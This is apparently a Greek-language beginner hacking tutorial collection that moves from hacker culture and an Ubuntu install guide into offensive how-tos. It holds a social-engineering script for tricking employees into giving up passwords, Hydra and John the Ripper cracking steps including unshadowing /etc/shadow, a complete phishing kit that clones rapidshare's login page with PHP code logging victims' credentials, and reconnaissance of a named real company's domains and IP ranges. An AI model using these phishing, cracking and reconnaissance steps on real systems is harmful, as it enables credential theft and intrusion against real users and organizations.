48
Μια συλλογή από tutorial για τις πιο διαδεδομένες μεθόδους hacking “Computer Science is no more about computers than astronomy is about telescopes” – Edsger W. Dijkstra by C4pt41n

Greek Track

Embed Size (px)

Citation preview

Page 1: Greek Track

Μια συλλογή από tutorial για τις πιο διαδεδομένες μεθόδους hacking

“Computer Science is no more about computers than astronomy is about telescopes” – Edsger W. Dijkstra

by C4pt41n

Page 2: Greek Track

Τι είναι ένας Hacker;

Υπάρχει μία κοινωνία, μια μοιρασμένη κουλτούρα, έμπειρων προγραμματιστών και βετεράνων των δικτύων, που έχει τις ρίζες της ιστορίας της δεκαετίες πίσω, στην εποχή των πρώτων μινι-υπολογιστών και των νεότερων ARPAnet πειραμάτων. Τα μέλη αυτής της κουλτούρας καθιέρωσαν τον όρο 'hacker'. Οι hackers έχτισαν το internet. Οι hackers διαμόρφωσαν το λειτουργικό σύστημα Unix σε αυτό που είναι σήμερα. Οι hackers τρέχουν το Usenet. Οι hackers κάνουν τον Παγκόσμιο Ιστό να δουλεύει. Αν είστε μέρος αυτής της κουλτούρας, αν έχετε συμβάλει σε αυτή και άλλοι άνθρωποι σε αυτή γνωρίζουν ποιός είστε και σας καλούν hacker, είστε ένας hacker.

Το σκεπτικό των hacker δεν περιορίζεται σε αυτή την κουλτούρα των hacker λογισμικού. Υπάρχουν άνθρωποι που εφαρμόζουν την ιδεολογία των hacker σε άλλους τομείς, όπως στα ηλεκτρονικά ή στη μουσική - ουσιαστικά, μπορείς να τη βρεις στα υψηλότερα επίπεδα κάθε επιστήμης ή τέχνης. Οι hackers λογισμικού αναγνωρίζουν αυτά τα εξευγενισμένα πνεύματα παντού και μπορεί να τους καλέσουν κι αυτούς 'hackers' - και μερικοί ισχυρίζονται ότι η φύση των hacker είναι πραγματικά ανεξάρτητη από το συγκεκριμένο μέσο που δουλεύουν οι hackers. Αλλά στο υπόλοιπο αυτού του εγγράφου θα επικεντρωθούμε στις ικανότητες των hacker λογισμικού.

Υπάρχει και μια άλλη ομάδα ανθρώπων που αυτοαποκαλούνται hackers, αλλά δεν είναι. Αυτοί είναι άνθρωποι (κυρίως έφηβοι) που βρίσκουν διασκεδαστικό το να εισβάλλουν σε υπολογιστές και να παραβιάζουν το σύστημα του τηλεφώνου. Οι πραγματικοί hackers ονομάζουν αυτούς τους ανθρώπους 'crackers' και δεν θέλουν να έχουν σχέσεις με αυτούς. Οι πραγματικοί hackers κυρίως πιστεύουν πως οι crackers είναι αργόσχολοι, ανεύθυνοι, και όχι και πολύ έξυπνοι, και το γεγονός ότι μπορείς να σπάσεις την ασφάλεια δεν σε κάνει hacker, όπως και το γεγονός ότι μπορείς να χαλάς αυτοκίνητα δεν σε κάνει μηχανικό αυτοκινήτων. Δυστυχώς, πολλοί δημοσιογράφοι και συγγραφείς έχουν ξεγελασθεί στην χρήση της λέξης 'hacker' και την χρησιμοποιούν για να περιγράψουν τους 'crackers'. Αυτό ενοχλεί υπερβολικά τους πραγματικούς hackers.

Η βασική διαφορά είναι αυτή: οι hackers χτίζουν πράγματα, οι crackers τα σπάνε.

Eric Steven Raymond

Page 3: Greek Track

Οι 5 μεγαλύτεροι παράνομοι hackers όλων των εποχώνΑυτοί οι hackers είναι η αφρόκρεμα των ηλεκτρονικών εγκλημάτων και συνελήφθησαν στην πλειοψηφία τους λίγα μόλις χρόνια αφού άφησαν την εφηβεία. Κάποιοι το έκαναν για οικονομικούς λόγους κάποιοι απλά για πλάκα.

1. Kevin Mitnick

Ο Mitnick είναι μάλλον το συνώνυμο του Ηacker. Το Υπουργείο Δικαιοσύνης των Η.Π.Α ακόμα αναφέρεται σε αυτόν χαρακτηρίζοντας τον ως «τον νούμερο ένα καταζητούμενο για ηλεκτρονικά εγκλήματα στην ιστορία των Η.Π.Α.». Τα κατορθώματά του έχουν εμπνεύσει δημιουργούς του Hollywood και συμπεριλαμβάνονται σε δύο ταινίες, στο Takedown και στο

Freedom Downtime. Ο Mitnick ξεκίνησε την «καριέρα» του από τον σύστημα καρτών λεωφορείων του Los Angeles όπου μπορούσε να εκτυπώνει κάρτες για τζάμπα διαδρομές. Μετά από εκεί το ενδιαφέρον του στράφηκε στα κινητά τηλέφωνα και μπήκε στο σύστημα της Digital Equipment Corporation κλέβοντας πολύτιμα software. Από εκεί και μετά ξεκίνησε μια διαδρομή δυόμιση χρόνων περίπου με τον Mitnick να παραβιάζει υπολογιστές, δίκτυα τηλεφώνων, κυβερνητικά έγγραφα και δημόσια συστήματα. Αυτό που έδωσε τέλος στην πορεία του ήταν η προσπάθεια του να παραβιάσει τον προσωπικό υπολογιστή ενός άλλου hacker, του Tsutomu Shimomura. Αυτή την στιγμή ο Moitnick είναι ενεργό μέλος της κοινωνίας δουλεύοντας ως υπεύθυνος ασφαλείας υπολογιστών, σχολιαστής και σύμβουλος.

2. Adrian Lamo

Ο Lamo έχει μείνει στην ιστορία ως ένας από τους μεγαλύτερους hackers γιατί «χτύπησε» μεγάλες εταιρίες όπως η Microsoft και η New York Times. Ο Lamo χρησιμοποιούσε ως επί το πλείστον δημόσιες συνδέσεις internet σε καφετέριες για να είναι πιο δύσκολο να εντοπιστεί, κάτι που του έδωσε το παρατσούκλι «άστεγος hacker». Η λίστα των εταιριών που απέκτησε πρόσβαση ο Lamo περιέχει επίσης τις, Υahoo!, Citigroup, Bank of America και Cingular, βέβαια στα πλαίσια της ομάδας White Hat Hackers οι οποίοι

Page 4: Greek Track

προσλαμβάνονται από τις ίδιες τις εταιρίες για να βρουν λάθη στο σύστημα προστασίας τους ο Lamo δεν διέπραξε κανένα έγκλημα αλλά παρέβη το νόμο όταν μπήκε στο ιδιωτικό σύστημα επικοινωνίας των New York Times. Αυτή την στιγμή ο Lamo έχει εκτίσει την διετή ποινή περιορισμού που του είχε επιβληθεί και είναι βραβευμένος δημοσιογράφος.

3. Jonathan James

Στα 16 του χρόνια ο James, έγινε ο πρώτος ανήλικος που καταδικάζεται για ηλεκτρονικά εγκλήματα με ποινή φυλάκισης. Αργότερα παραδέχτηκε ο ίδιος ότι το έκανε για πλάκα και απολάμβανε τις προκλήσεις. Ο James «χτυπούσε» μεγάλους δημόσιους οργανισμούς όπως ένα παράρτημα του Υπουργείου Δικαιοσύνης και έπαιρνε κωδικούς για να έχει πρόσβαση σε απόρρητους λογαριασμούς e-mail. Εκτός από αυτά ο James απέκτησε πρόσβαση στους υπολογιστές της NASA και έκλεψε πολύτιμα software συνολικής αξίας 1,7 εκατ. δολαρίων. Αυτή την στιγμή ο James επιχειρεί να αναπτύξει την δικιά του επιχείρηση ασφάλειας υπολογιστών.

4. Robert Tappan Morris

Ο Morris είναι γιος ενός πράκτορα της NSA και δημιουργός του Morris worm. To worm είναι ένα είδος ιού που εξαπλώνεται και αυτό-αντιγράφεται ανεξέλεγκτα καταστρέφοντας χιλιάδες μηχανήματα. Το συγκεκριμένο worm ήταν το πρώτο που αναπτύχθηκε και διαδόθηκε μέσω του internet. Ο Morris το δημιούργησε ενώ ήταν φοιτητής στο Cornell και ισχυρίστηκε ότι το έκανε απλά για να δει πόσο μεγάλο ήταν το internet εκείνη την στιγμή. Το worm ωστόσο άρχισε να διαδίδεται ανεξέλεγκτα προκαλώντας πρόβλημα σε χιλιάδες υπολογιστές κάτι που κόστισε στον Morris ένα βαρύ πρόστιμο και 400 ώρες κοινωνικής εργασίας. Σήμερα o Morris είναι καθηγητής στο πανεπιστήμιο MIT στο τμήμα Computer Science και ο τομέας έρευνας του είναι η αρχιτεκτονική των δικτύων υπολογιστών.

5. Kevin Poulsen

Πιο γνωστός με το παρατσούκλι του, Dark Dante, ο Kevin Poulsen έγινε γνωστός εισβάλοντας στο τηλεφωνικό κέντρο του ραδιοφωνικού σταθμού KISS-FM του Los Angeles παρεμβαίνοντας στις κληρώσεις και κερδίζοντας μεγάλα δώρα μεταξύ των οποίων και μια Porsche. Το FBI άρχισε να ασχολείται με τον Poulsen αφού απέκτησε πρόσβαση σε αρχεία της υπηρεσίας και αποσπούσε σημαντικές και απόρρητες πληροφορίες. Η ειδικότητά του ήταν οι τηλεφωνικές γραμμές και αποκτούσε πρόσβαση σε μεγάλα δίκτυα προκαλώντας το χάος. Αφού συνελήφθη σε ένα σουπερμάρκετ καταδικάστηκε για πέντε χρόνια, και ενώ ήταν στην φυλακή δούλευε ως δημοσιογράφος και αργότερα εκδότης των Wired News.

Αυτοί ήταν και οι πιο γνωστοί παράνομοι hackers στην ιστορία των Η.Π.Α αλλά δεν θα πρέπει να ξεχνάμε και την άποψη των πολλών που ισχυρίζονται ότι οι μεγαλύτεροι και καλύτεροι hackers είναι αυτοί που δεν τους ξέρει κανείς!

Page 5: Greek Track

Βασικές Ικανότητες του Hacking: Προγραμματισμός

Ο προγραμματισμός αποτελεί την πιο βασική κατά την γνώμη μου ικανότητα ενός hacker. Αν δεν γνωρίζεις καμία γλώσσα προγραμματισμού σου συνιστώ να ξεκινήσεις με την Python. Όπως υποστηρίζει και ο Eric Steven Raymond η Python είναι καθαρά σχεδιασμένη, καλά τεκμηριωμένη, και σχετικά φιλική προς τους αρχάριους. Εκτός από το ότι αποτελεί μια καλή πρώτη γλώσσα, δεν είναι απλώς ένα παιχνίδι. Είναι πολύ ισχυρή και ελαστική και κατάλληλη για μεγάλα projects.

Για να ξεκινήσεις με την Python χρειάζεσαι έναν καλό “tutorial” για αρχάριους το οποίο μπορείτε να βρείτε και στο site της Python. Άλλες χρήσιμες για τον hacker γλώσσες προγραμματισμού είναι η “Perl”, η “C” και η “Lisp'', τις οποίες όμως θα χρειαστεί να μάθεις αφού πρώτα μάθεις καλά την Python.

Επίσης πολύ σημαντική είναι η HTML η οποία ειδικεύεται στην περιγραφή της δομής μιας ιστοσελίδας. Δεν είναι αρκετό να γνωρίζεις πως να χρησιμοποιήσεις έναν Browser (φυλλομετρητή). Η html θα σου διδάξει καλές συνήθειες και για τις υπόλοιπες γλώσσες.Μια καλή δοκιμασία για να τεστάρεις τις γνώσεις σου πάνω στην html είναι η δημιουργίαμιας ιστοσελίδας.

Page 6: Greek Track

Βασικές Ικανότητες του Hacking: Χρήση Unix

Θα θεωρήσω πως έχεις έναν προσωπικό υπολογιστή ή πως έχεις πρόσβαση σε έναν. Το πρώτο και το πιο σημαντικό που μπορεί να κάνει ένας αρχάριος ώστε να αρχίσει την πορεία του στο hacking, είναι να πάρει μια διανομή Linux να την εγκαταστήσει σε έναν προσωπικό υπολογιστή.

Ναι, υπάρχουν και άλλα λειτουργικά συστήματα στον κόσμο εκτός από το Unix. Αλλά όλα τα άλλα μοιράζονται σε δυαδική μορφή - δεν μπορείς να διαβάσεις τον κώδικα και δεν μπορείς να τον τροποποιήσεις. Το να προσπαθείς να μάθεις να κάνεις hacking σε μια μηχανή Microsoft Windows ή σε οποιοδήποτε άλλο σύστημα κλειστού κώδικα, είναι σαν να προσπαθείς να μάθεις να χορεύεις ενώ φοράς μια πανοπλία.

Το Unix είναι το λειτουργικό σύστημα του Internet. Ενώ μπορείς να μάθεις να χρησιμοποιείς το Internet χωρίς να γνωρίζεις το Unix, δεν μπορείς να γίνεις Internet hacker χωρίς να καταλαβαίνεις το Unix. Για αυτό το λόγο, η κουλτούρα των hacker σήμερα είναι ιδιαίτερα επικεντρωμένη στο Unix. (Αυτό δεν ήταν πάντα αλήθεια , και κάποιοι παλιοί hackers ακόμα δεν είναι ευχαριστημένοι με αυτό, αλλά η συμβίωση ανάμεσα στο Unix και στο Internet έχει γίνει τόσο δυνατή που ούτε ο μυς της Microsoft δεν φαίνεται ικανός να την κάμψει σοβαρά.)

Παρακάτω ακολουθεί οδηγάς για εγκατάσταση την διανομής ubuntu (το ubuntu είναι κατά την γνώμη η πιο φιλική για τον χρήστη διανομή linux).

Κάνουμε επανεκκίνηση του Υπολογιστή με το dvd φορτωμένο και επιλέγουμε boot από το tray (CD/DVD Drive). Στην πρώτη οθόνη που εμφανίζεται, επιλέγουμε γλώσσα εγκατάστασης και δίδουμε εντολή για φόρτωμα του Linux.

Page 7: Greek Track

Το επόμενο βήμα είναι να αποδεχθούμε την Γλώσσα για το πληκτρολόγιο, την περιοχή και την ζώνη ώρας.

Page 8: Greek Track

Σε συνέχεια επιλέγουμε την Διαμέριση δίσκων. Δημιουργούμε το βασικό τμήμα επιλέγοντας το Journal ext 3 (πράσινο χρώμα) και σε συνέχεια δημιουργούμε το SWAP (πορτοκαλί χρώμα) και το οποίο πρέπει να είναι το διπλάσιο της μνήμης του P/C και του δίδουμε την εντολή για μορφοποίηση και Εγκατάσταση.

Page 9: Greek Track
Page 10: Greek Track
Page 11: Greek Track

Κατόπιν κάνουμε επιλογή-εγκατάσταση του βασικού συστήματος, εφόσον πρώτα δώσουμε τα στοιχεία με τα οποία θα κάνουμε την σύνδεση κατά την έναρξη του λειτουργικού καθώς επίσης και τον root. Μας ζητά την επιβεβαίωση των δεδομένων και δίδουμε την εντολή να ξεκινήσει η εγκατάσταση.

Page 12: Greek Track
Page 13: Greek Track

Με το πέρας της εγκατάστασης, που κρατά από 45΄ Λεπτά έως και 1h:15΄ Λεπτά, ανάλογα με την ταχύτητα του P/C, μας ζητά να αφαιρέσουμε το DVD και να πραγματοποιήσουμε επανεκκίνηση.

Μετά την επανεκκίνηση γίνετε εισαγωγή στο λειτουργικό δίδοντας τον user και τον κωδικό, εφόσον πριν έχουν γίνει μερικές τελευταίες ρυθμίσεις (αυτόματα).

Page 14: Greek Track

Passwords - Κωδικοί

Στις μέρες μας, οι κωδικοί είναι το μόνο μέτρο προστασίας στα περισσότερα site και υπολογιστικά συστήματα. Έχει καταντήσει να είναι ο ποιο εύκολος και απλός τρόπος για να εισβάλλει ένας hacker σε ένα σύστημα.

Password Cracking – Σπάσιμο κωδικών

Social Engineering – Κοινωνική μηχανική είναι η πράξη της προφορικής χειραγώγησης ατόμων με σκοπό την απόσπαση πληροφοριών. Αν και είναι παρόμοια με το τέχνασμα ή την απλή απάτη, ο όρος είναι κυρίως συνδεδεμένος με την εξαπάτηση ατόμων με σκοπό την απόσπαση εμπιστευτικών πληροφοριών που είναι απαραίτητες για την πρόσβαση σε κάποιο υπολογιστικό σύστημα. Συνήθως αυτός που την εφαρμόζει δεν έρχεται ποτέ πρόσωπο με πρόσωπο με το άτομο που εξαπατά ή παραπλανά. Παρόλο που ο όρος ίσως να μην είναι ακριβής ή επιτυχημένος έχει πλέον καθιερωθεί. Ο πρώην εγκληματίας υπολογιστών και αργότερα σύμβουλος ασφαλείας πληροφορικών συστημάτων Κέβιν Μίτνικ διέδωσε τον όρο «κοινωνική μηχανική», επισημαίνοντας ότι είναι πολύ ευκολότερο να ξεγελάσεις κάποιον να δώσει έναν κωδικό πρόσβασης για ένα σύστημα από το να προσπαθήσεις να τον σπάσεις. Παρακάτω ακολουθεί ένα απλό παράδειγμα κοινωνικής μηχανικής, τα πρόσωπα της συνομιλίας είναι: ένας υπάλληλος μεγάλης εταιρίας – θύμα και ο hacker που πραγματοποιεί μια επίθεση κοινωνικής μηχανικής.

-hacker: Για σας κύριε <όνομα υπαλλήλου> , το όνομα μου είναι <τυχαίο όνομα> και καλώ από την software service. Αυτήν την στιγμή προσπαθούμε να αναβαθμίσουμε το λογισμικό στους υπολογιστές της εταιρίας σας αλλά δεν μπορούμε να συνδεθούμε στην βάση δεδομένων σας. Θα μπορούσατε μήπως να με βοηθήσετε με τα στοιχεία εισόδου (κωδικοί) ώστε να μην βρω τον μπελά μου με το αφεντικό μου?! Θα σας ξανά τηλεφωνήσω σε λίγα λεπτά μόλις πραγματοποιηθεί η αναβάθμιση.Προφανώς ο υπάλληλος της εταιρίας θα δώσει στον hacker τον κωδικό εισόδου χωρίς καμία πιστοποίηση.

Page 15: Greek Track

Dictionary Attacks είναι η τεχνική που ο hacker προσπαθεί να βρει τον κωδικό εισόδου ενός άλλου χρήστη χρησιμοποιώντας μια λίστα από πιθανούς κωδικούς πρόσβασης. Παρακάτω ακολουθεί ένας οδηγός για την χρήση του Hydra.

Εγκαταστήστε το Hydra, και τρέξτε την εκδοση του με γραφικό περιβάλλον για μεγαλύτερη ευκολία. Στην περίπτωση μας θέλουμε να σπάσουμε έναν κωδικό σε ένα ftp server έτσι συμπληρώνουμε την διεύθυνση του server (π.χ. Ftp.tripod.com), το πρωτόκολλο (π.χ. Ftp, ανάλογα με την περίπτωση) και την θύρα (στην περιπτωση μας 21).

Έπειτα πάμε στην καρτέλα με τίτλο Passwords, ήρθε η ώρα να δηλώσουμε το όνομα χρήστη του θύματος καθώς και την λίστα με τους πιθανούς κωδικούς.

Page 16: Greek Track

Οι υπόλοιπες καρτέλες και επιλογές είναι προαιρετικές και δεν θα μας απασχολήσουν σε αυτόν τον οδηγό. Οπότε μπορούμε πολύ απλά να πάμε στην τελευταία καρτέλα με τίτλο “Start” για να ξεκινήσουμε την διαδικασία εύρεσης του password.

Page 17: Greek Track

Κάνουμε κλικ στο κουμπί “Start” και περιμένουμε να ολοκληρωθεί η διαδικασία, μόλις ολοκληρωθεί θα εμφανιστεί στην οθόνη το ονομα χρήστη και ο κωδικός πρόσβασης άν αυτός υπάρχει μέσα στην λίστα με τους πιθανούς κωδικούς.

Page 18: Greek Track

Brute-force Attacks είναι επιθέσεις που δοκιμάζουν κάθε πιθανό συνδυασμό χαραχτήρων μέχρι να βρουν τον πραγματικό κωδικό εισόδου σε μια υπηρεσία. Οι Brute-force επιθέσεις είναι πολύ χρονοβόρες, καθώς ο χρόνος εύρεσης του κωδικού εξαρτάτεται από το μήκος (σε χαραχτήρες), την πολυπλοκότητα του κωδικού (σε χαραχτήρες) καθώς επίσης και την επεξεργαστική ισχύ του υπολογιστή που πραγματοποιεί την επίθεση. Παρακάτω ακολουθεί ένας οδηγός για το σπάσιμο ενός συστήματος με την χρήση του John the Ripper (Ο Ιωάννης ο Αντεροβγάλτης).

Το πρόγραμμα John The Ripper ( http://www.openwall.com/john/ ) είναι ο γρηγορότερος password cracker, διατίθεται για συστήματα Unix-like, DOS, Windows, BeOs και για OpenVMS. Ο John The Ripper χρησιμοποιείται από τους διαχειριστές συστημάτων για να "τεστάρουν" τον password τους σε θέματα ασφαλείας, αν "σπάει" γρήγορα και σε πόσο χρόνο. Επίσης,σε περίπτωση που ξεχάσουμε τον password ενός συστήματος μπορούμε να τον ξαναβρούμε με αυτό το πρόγραμμα. Γενικότερα το χρησιμοποιούμε για να "σπάμε" password !ΕΓΚΑΤΑΣΤΑΣΗ-ΧΡΗΣΗΗ εγκατάσταση που ακολουθεί παρακάτω, αναφέρεται σε ένα σύστημα GNU/linux i686.

1.πηγαίνουμε σε μια directory για να ξεκινήσουμε ανοίγουμε ένα Shell και γράφουμε,Α. $ cd /var/tmp

2.κατεβάζουμε το John The RipperΒ. $ wget http://www.openwall.com/john/b/john-1.6.tar.gz

3. αποσυμπιέζουμε το John The RipperΓ. $ tar xzvpf john-1.6.tar.gz

4. μπαίνουμε στην directory των "πηγών" του John The RipperΔ. $ cd john-1.6/src

Page 19: Greek Track

5. γινόμαστε rootΕ. $ su και γράφουμε...Ζ. # make linux-x86-mmx-elf ( για τους ubuntu-αδες, προσπερνάτε το βημα 5 και γράφεται sudo make linux-x86-mmx-elf!)

6. μπαίνουμε στην directory Η. # cd ../run/

Πρώτα από όλα πρέπει να χρησιμοποιήσουμε την εντολή που ενώνει σε ένα αρχείο όλα τα hash των αρχείων/etc/passwd και /etc/shadow στο αρχειο passwords.

Γράφουμε λοιπόν.... # ./unshadow /etc/passwd /etc/shadow > passwords

Ώστε να ακολουθήσει έπειτα μια διαδικασία,αρκετά χρονοβόρα, brute-force όπου μπορεί να μας δώσει πολύ καλά αποτελέσματα.Γράφουμε....# ./john passwords

Χρησιμοποιώντας την παρακάτω εντολή μπορείτε να εμφανίσεται τις διάφορες επιλογές του προγράμματος.# ./john Σε αυτό το σημείο θα σας δώσω ένα απλό παράδειγμα της χρήσης του...

Δημιουργούμε τον user "test"! με password την λεξη "secret"!Θα επιχειρήσουμε με το John The Ripper να βρούμε την password του εν λόγω χρήστη στο σύστημα μας.

1. # adduser test

2. # passwd test [secret]

3. # ./unshadow /etc/passwd /etc/shadow > passwords 4. # ./john -i:alpha passwords

Page 20: Greek Track

Loaded 4 passwords with 4 different salts........κ.λ.π.

Έτσι λοιπόν σε ελάχιστο χρόνο βρίσκεται τον password "secret" του user "test"!Μπορείτε να συνεχίσετε την ανάλυση η να την διακόψετε από το πληκτρολόγιο "πατώντας" CTRL+C.Αν θέλετε να συνεχίσετε από εκεί που σταμάτησε το πρόγραμμα γράφετε# ./john -restoreΜε την παρακάτω εντολή, δύνασθε ανά πάσα στιγμή να "βλέπετε" τους password σε κάθε στιγμή της διαδικασίας...

# ./john -show passwordstest:secret:502:502::/home/test:/bin/bash1 password cracked, 3 left

Τώρα μπορείτε να "σβήσετε" τον χρήστη του παραδείγματος μας με την εντολή # userdel test

Rainbow Tables 'Ένα rainbow table είναι μια τεράστια λίστα από Hash για κάθε πιθανό συνδυασμό χαραχτήρων. Ένα κωδικός Hash είναι ένας κωδικός ο οποίος έχει μετατραπεί σε κάτι εντελώς διαφορετικό με την χρήση μαθηματικών . αλγορίθμων. Τα hash δεν (από κατασκευής) δεν μπορούν να αποκρυπτογραφηθούν. Ένας πολύ κοινός τρόπος κρυπτογράφησης των hash είναι ο αλγόριθμος MD5 ο οποίος χρησιμοποιέιτε στα περισσότερα web sites. Ας πούμε ότι εγγράφεσε σε ένα site, χρησιμοποιείς εναν κωδικό αυτός ο κωδικός μέσω του αλγόριθμου MD5 μετατρέπετε σε hash και αποθηκεύεται στο site. Όταν συνδέεσαι στο site ο κωδικός που εισάγεις μετατρέπετε σε hash μέσω του αλγόριθμου MD5 και συγκρίνεται με το hash του κωδικού που είχες δηλώσει κατά την εγγραφή σου στο site, αν είναι ίδια τότε η σύνδεση σου στο site επιτρέπεται. Κάθε συνδυασμός χαραχτήρων δημιουργεί ένα διαφορετικό hash, έτσι άμα έχεις μια λίστα από hash για κάθε πιθανό χαραχτήρα μπορείς να σπάσεις κωδικούς πολύ πιο γρήγορα από ότι με μεθόδους brute-force και dictionary. Ένα παράδειγμα του rainbow table cracking θα δούμε στο κεφάλαιο “Windows Password Hacking”.

Page 21: Greek Track

Phishing Μία τεχνική του hacking που χρησιμοποιείται για κλέψιμο κωδικών και λογαριασμών είναι το Phishing. Στο συγκεκριμένο οδηγό θα αναλύσουμε την τεχνική αυτήν μέσα από ένα παράδειγμα για να δούμε πως μπορούν οι hackers να ξεγελάσουν τα θύματα τους για να κλέψουν τους κωδικούς πρόσβασης τους.

Θα χρησιμοποιήσουμε την ιστοσελίδα rapidshare.com σαν παράδειγμα για τον οδηγό μας.

Πηγαίνουμε λοιπόν στο site http://www.rapidshare.com και επιλέγουμε να πάμε στην σελίδα premium zone. Εκεί κάνουμε δεξί κλικ στην σελίδα και επιλέγουμε προβολή προέλευσης. Επιλέγουμε όλο των κώδικα και τον αντιγράφουμε σε ένα έγγραφο σημειωματάριου.

Στον κώδικα μας ενδιαφέρουν δύο λέξεις: method και action. Ψάχνουμε με την εύρεση (ctrl+F) για να βρούμε που αναφέρεται η λέξη method. Θα δούμε ότι στο αποτέλεσμα θα μας εμφανίσει method=”post” και αλλάζουμε το post με την λέξη get.

Τώρα ψάχνουμε για την λέξη action μέσα στον κώδικα και θα δούμε κάτι σαν το παρακάτω:

action=”https://ssl.rapidshare.com/cgi-bin/premiumzone.cgi“

Αντικαθιστούμε τον παραπάνω σύνδεσμο με το next.php δηλαδή:

action=”next.php”

Σώζουμε αυτό το αρχείο σαν index.html και τώρα θα δημιουργήσουμε την σελίδα next.php. Δημιουργούμε ένα νέο έγγραφο σημειωματάριου και πληκτρολογούμε τον παρακάτω κώδικα:

Κώδικας:<?php$datum = date(‘d-m-Y / H:i:s’);$ip = $_SERVER['REMOTE_ADDR'];header(“Location: Εδώ βάζουμε το redirect url”);$handle = fopen(“password.txt”, “a”);foreach($_GET as $variable => $value) {fwrite($handle, $variable);fwrite($handle, “=”);fwrite($handle, $value);fwrite($handle, “\r\n”);}fwrite($handle, “IP: $ip | Date: $datum (Date=0 GTM)\r\n”);fwrite($handle, “\r\n”);fclose($handle);

setcookie (“user”, “empty”, time()+3600);exit;?>

Page 22: Greek Track

• Η σελίδα next.php θα είναι και η σελίδα στην οποία θα κατευθυνθούν οι χρήστες αφότου βάλουν τις πληροφορίες λογαριασμού τους στην πρώτη σελίδα.

Στον παραπάνω κώδικα μετά από την λέξη location βάζουμε το redirect url μας το οποίο μπορεί να είναι η αυθεντική σελίδα του rapidshare ή οποιαδήποτε άλλη σελίδα επιθυμούμε εμείς να κατευθύνει τα θύματα μας αφότου βάλουν τις πληροφορίες του λογαριασμού τους.

Επιλέγουμε για το παράδειγμα μας την αυθεντική σελίδα του rapishare.Δηλαδή θα έχουμε:

header(“Location: https://ssl.rapidshare.com/cgi-bin/premiumzone.cgi”);

Σώζουμε αυτό το αρχείο σαν next.php και τώρα δημιουργούμε ένα ακόμα έγγραφο σημειωματάριου με την ονομασία password.txt το οποίο και θα είναι το έγγραφο στο οποίο θα αποθηκεύονται οι πληροφορίες των λογαριασμών των θυμάτων.

Πηγαίνουμε σε ένα free web hosting site που υποστηρίζει php (όπως http://www.freeweb7.com/) και αφού σιγουρευτούμε ότι έχουμε διαγράψει όλα τα default αρχεία που υπάρχουν από τον web hosting provider όπως το index.html ανεβάζουμε τα 3 αρχεία μας (index.html,next.php,password.txt).

Τώρα πηγαίνουμε στην ιστοσελίδα που έχουμε φτιάξει και βάζουμε “test” στο login και “test” στο password για να τσεκάρουμε αν θα εμφανιστούν στο password.txt. Αν εμφανιστούν τότε σημαίνει ότι η ψεύτικη μας σελίδα δουλεύει.

• Άλλα Προγράμματα

- Cain and Abel- SolarWinds- Rainbow Crack- Brutus

Page 23: Greek Track

Network Hacking

Footprinting Είναι η τεχνική συλλογής πληροφοριών σχετικά με τα υπολογιστικά συστήματα και των οντοτήτων που ανήκουν αυτά. Έτσι λοιπόν πριν από μία επίθεση σε ένα δίκτυο αυτήν η διεργασία είναι ιδιαίτερα χρήσιμη καθώς έχει σαν σκοπό την εύρεση όσο το δυνατόν περισσότερων πληροφοριών σχετικά με το δίκτυο. Αλλά πως μπορεί κάποιος να συλλέξει αυτές της πληροφορίες?

Τι θα πρέπει να ψάξουμε αρχικά?

Καταρχάς η ιστοσελίδα της εταιρείας είναι το αρχικό μας σημείο καθώς συνήθως θα μας δώσει εύκολα και αβίαστα τις πρώτες μας πληροφορίες.Χρήσιμα στοιχεία που μπορούμε να βρούμε εκεί μέσα είναι τα εξής:Αριθμοί τηλεφώνων,emails,ονόματα,τοποθεσίες και άλλες εταιρείες που σχετίζονται με τον στόχο μας.Επίσης πολλές φορές υπάρχουν στον πηγαίο κώδικα των ιστοσελίδων πληροφορίες αρκετά χρήσιμες στα σχόλια.Οπότε κοιτάμε και τα σχόλια για να βρούμε κάτι ενδιαφέρον.Ακόμα οι μηχανές αναζήτησης μπορούνε να μας βοήθησουνε ακόμα περισσότερο στο να φτιάξουμε το προφίλ του στόχου μας.

Καθορισμός των Domain Names και Network Blocks

Το επόμενο μας βήμα είναι να βρούμε ποια είναι τα Domain Names της εταιρείας και το εύρος των IP's που της αντιστοιχούν στο δίκτυο της.Η ανεύρεση αυτών των στοιχείων γίνετια ως εξής:

Χρησιμοποιώντας το query whois σε βάσεις δεδομένων που έχουν καταχωρημένα τα register domains.Για την Ευρώπη για παράδειγμα μία τέτοια ιστοσελίδα είναι το www.ripe.net

Υπάρχουν 5 queries που μπορούν να χρησιμοποιηθούν με την εντολή whois και μπορούν να μας αποδώσουν πολύ κρίσιμες πληροφορίες για την επίθεση μας.Τα queries αυτά είναι:Το registrar query,τo organizational query,το domain query,το network query και το point of contact query.

Παράδειγμα:Χρησιμοποιούμε κατά κύρια βάση την ιστοσελίδα www.networksolutions.com για να ψάξουμε για την εταιρεία που θέλουμε σε περίπτωση που είναι ελληνική.Για παράδειγμα σε περίπτωση που χρησιμοποιήσουμε το query whois σε αυτό το site για το domain MARFININVESTMENTGROUP.COM θα πάρουμε τα ακόλουθα αποτελέσματα:

Page 24: Greek Track

Domain Name: MARFININVESTMENTGROUP.COMRegistrar: ONLINENIC, INC.Whois Server: whois.onlinenic.comReferral URL: http://www.OnlineNIC.com

Name Server: NS.MARFINBANK.GRName Server: NS1.MARFINGROUP.GRStatus: clientTransferProhibitedUpdated Date: 26-feb-2009Creation Date: 10-may-2007Expiration Date: 10-may-2010

Σημείωση:Αναλόγως και το τι στοιχεία έχει προμηθεύσει η εταιρεία μπορούμε να πάρουμε και περισσότερα στοιχεία όπως αναφέραμε και πιο πάνω.

Το επόμενο μας βήμα είναι να εντοπίσουμε το εύρος των IP που χρησιμοποιούνε στο δίκτυο τους.Χρησιμοποιώντας την βάση δεδομένων της ιστοσελίδας www.ripe.net έχουμε τα ακόλουθα αποτελέσματα:

inetnum: 195.97.15.0 - 195.97.15.127netname: MARFINdescr: Marfin Investmentsdescr: Kifissias 225-227, Athens, 14561country: GRadmin-c: KV138-RIPEtech-c: HOL-RIPEstatus: ASSIGNED PA mnt-by: AS3329-MNTsource: RIPE # Filtered

role: HOL Network Operations Centeraddress: Hellas On Line S.A.address: 2, Andrianiou Str & Papadaaddress: 11521 Ampelokipoi, Athens, Greeceabuse-mailbox: [email protected]: [email protected]: TK583-RIPEadmin-c: AI1568-RIPEtech-c: TK583-RIPEtech-c: AI1568-RIPE

Page 25: Greek Track

nic-hdl: HOL-RIPEmnt-by: AS3329-MNTsource: RIPE # Filtered

